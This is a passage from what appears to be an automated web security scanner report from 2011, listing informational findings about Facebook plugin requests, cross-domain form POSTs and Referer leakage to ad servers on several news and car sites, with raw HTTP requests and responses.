18.2. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&layout=button_count&show_faces=false&width=100&action=like&font=arial&action=recommend&width=125 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.193.39
X-Cnection: close
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 23550

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e62c969ebc021a21222099" class="connect_widget button_count" style="font-family: "arial", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">5</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">4</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"f44c1501",fb_dtsg:"AQD3-NrH",no_cookies:1,lhsh:"SAQDASq55"};
</script>
<script>

onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","nodeType":"link","externalURL":"http:\/\/content.usatoday.com\/communities\/campusrivalry\/post\/2011\/09\/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state\/1","pageId":null,"widgetID":"connect_widget_4e62c969ebc021a21222099","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":fal
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&layout=button_count&show_faces=false&width=100&action=like&font=arial&action=recommend&width=125 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.195.58
X-Cnection: close
Date: Sun, 04 Sep 2011 00:42:26 GMT
Content-Length: 23395

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e62c97245a5f2963034818" class="connect_widget button_count" style="font-family: "arial", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">5</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">4</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"b6f87946",fb_dtsg:"AQD3-NrH",no_cookies:1,lhsh:"GAQCX5XkZ"};
</script>
<script>

onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","nodeType":"link","externalURL":"http:\/\/content.usatoday.com\/communities\/campusrivalry\/post\/2011\/09\/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state\/1","pageId":null,"widgetID":"connect_widget_4e62c97245a5f2963034818","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":fal
...[SNIP]...

18.3. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?api_key=5597051e9d2034b294865dbb43c47ee0&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffe70414%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fthecharlotteobserver&locale=en_US&sdk=joey&show_faces=false&stream=false&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.24.54
X-Cnection: close
Date: Sun, 04 Sep 2011 01:09:33 GMT
Content-Length: 8517

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e62cfccf39871a44619590" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">6,853</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></sp
...[SNIP]...

Request 2

GET /plugins/likebox.php?api_key=5597051e9d2034b294865dbb43c47ee0&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffe70414%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fthecharlotteobserver&locale=en_US&sdk=joey&show_faces=false&stream=false&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.35.39
X-Cnection: close
Date: Sun, 04 Sep 2011 01:09:40 GMT
Content-Length: 8428

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e62cfd479f768c59733549" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">6,853</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></sp
...[SNIP]...

18.4. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Request 1

GET /plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.15.49
X-Cnection: close
Date: Sun, 04 Sep 2011 01:11:09 GMT
Content-Length: 21035

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Facebook</title><style>body{background:#fff;font-size: 11px;font-f
...[SNIP]...
<div id="u866976_1" class="fbConnectWidgetTopmost" style="height:298px; width:288px; font-family:"arial", sans-serif;"><div style="overflow: hidden;height:275px; "><div class="phm fbConnectWidgetHeaderTitle uiBoxLightblue"><div class="clearfix"><div class="lfloat"><div class="fbWidgetTitle fsl fwb fcb">Recommendations</div></div><div class="rfloat"></div></div></div><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="charlotteobserver.com" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_1" value="http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u866976_2"><input value="Sign Up" type="submit" id="u866976_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u866976_1").login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_4897caf8c883bccf"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Man's penis cut off, put through garbage disposal | CharlotteObserver.com & The Charlotte Observer N" href="http://www.charlotteobserver.com/2011/07/12/2449054/police-ca-woman-cut-off-husbands.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQBcR6QYJsVCt4y0&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F07%2F12%2F16%2F53%2F196-1fVPWN.Em.55.jpg" alt="" /></a><div class="UIImageBlock_Content UIIma
...[SNIP]...

Request 2

GET /plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.232.48
X-Cnection: close
Date: Sun, 04 Sep 2011 01:11:43 GMT
Content-Length: 20883

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Facebook</title><style>body{background:#fff;font-size: 11px;font-f
...[SNIP]...
<div id="u870365_1" class="fbConnectWidgetTopmost" style="height:298px; width:288px; font-family:"arial", sans-serif;"><div style="overflow: hidden;height:275px; "><div class="phm fbConnectWidgetHeaderTitle uiBoxLightblue"><div class="clearfix"><div class="lfloat"><div class="fbWidgetTitle fsl fwb fcb">Recommendations</div></div><div class="rfloat"></div></div></div><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u870365_2"><input value="Sign Up" type="submit" id="u870365_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u870365_1").login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_4897caf8c883bccf"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Man's penis cut off, put through garbage disposal | CharlotteObserver.com & The Charlotte Observer N" href="http://www.charlotteobserver.com/2011/07/12/2449054/police-ca-woman-cut-off-husbands.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQBcR6QYJsVCt4y0&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F07%2F12%2F16%2F53%2F196-1fVPWN.Em.55.jpg" alt="" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://www.charlotteobserver.com/2011/07/12/2449054/police-ca-woman-cut-off-husbands.html" tar
...[SNIP]...

19. Cross-domain POST previous next
There are 4 instances of this issue:

http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
http://www.cars.com/go/advice/index.jsp
http://www.cars.com/go/crp/index.jsp
http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

19.1. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

email
uri
title
loc

Request

GET /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:13 GMT
Content-Length: 48884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicationServer" xmlns:o
...[SNIP]...
<div class="form-row">
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=CampusRivalryCommunityFeed', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<input type="text" style="width:140px;margin-bottom:1px;" name="email"/>
...[SNIP]...

19.2. http://www.cars.com/go/advice/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/advice/index.jsp

Issue detail

The page contains a form which POSTs data to the domain cars.repairpal.com. The form contains the following fields:

Request

GET /go/advice/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.3. http://www.cars.com/go/crp/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/crp/index.jsp

Issue detail

The page contains a form which POSTs data to the domain cars.repairpal.com. The form contains the following fields:

Request

GET /go/crp/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.4. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.charlotteobserver.com
Path:	/2011/09/03/2577566/raceday-danica-already-gone.html

Issue detail

The page contains a form which POSTs data to the domain gallery.pictopia.com. The form contains the following fields:

prefill
request_date
request_photographer
request_owner
request_page
request_desc
request_image

Request

GET /2011/09/03/2577566/raceday-danica-already-gone.html HTTP/1.1
Host: www.charlotteobserver.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

20. Cross-domain Referer leakage previous next
There are 30 instances of this issue:

http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY
http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY
http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY
http://ad.doubleclick.net/adj/mi.clt00/Sports
http://ad.doubleclick.net/adj/mi.clt00/Sports
http://ad.doubleclick.net/adj/mi.sac00/Lifestyle
http://ad.doubleclick.net/adj/mi.sac00/Lifestyle
http://admeld.adnxs.com/usersync
http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx
http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5
http://anrtx.tacoda.net/rtx/r.js
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.npc-mcclatchy.overture.com/js_1_0/
http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH
http://googleads.g.doubleclick.net/pagead/ads
http://imp.fetchback.com/serve/fb/imp
http://pixel.invitemedia.com/admeld_sync
http://rtq.careerbuilder.com/RTQ/jobstream.aspx
http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php
http://www.google.com/search
http://www.google.com/trends/hottrends
http://www.google.com/trends/hottrends
http://www.google.com/trends/hottrends
http://www.google.com/trends/hottrends
http://www.google.com/trends/hottrends
http://www.google.com/trends/hottrends
http://www.reuters.com/assets/commentsChild

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

20.1. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY;sect=mfootbl;pos=story;sz=300x250;tile=1;ord=4556314295623451?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1271867/nd_hosp-030711-300.gif

Request

GET /adj/CSTV.ND/SPORTS.MFOOTBL.BODY;sect=mfootbl;pos=story;sz=300x250;tile=1;ord=4556314295623451? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 400
Date: Sun, 04 Sep 2011 00:43:25 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/t;237761630;0-0;0;13655887;4307-300/250;41051265/41069052/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://notredame-hospitality.cbscollegestore.com/store.cfm?dept_id=17785&store_id=468&partner_id=18081"><img src="http://s0.2mdn.net/viewad/1271867/nd_hosp-030711-300.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.2. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY;sect=mfootbl;pos=bot;sz=728x90;tile=2;ord=4556314295623451?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1271868/nd_auct-011211-728.gif

Request

GET /adj/CSTV.ND/SPORTS.MFOOTBL.BODY;sect=mfootbl;pos=bot;sz=728x90;tile=2;ord=4556314295623451? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
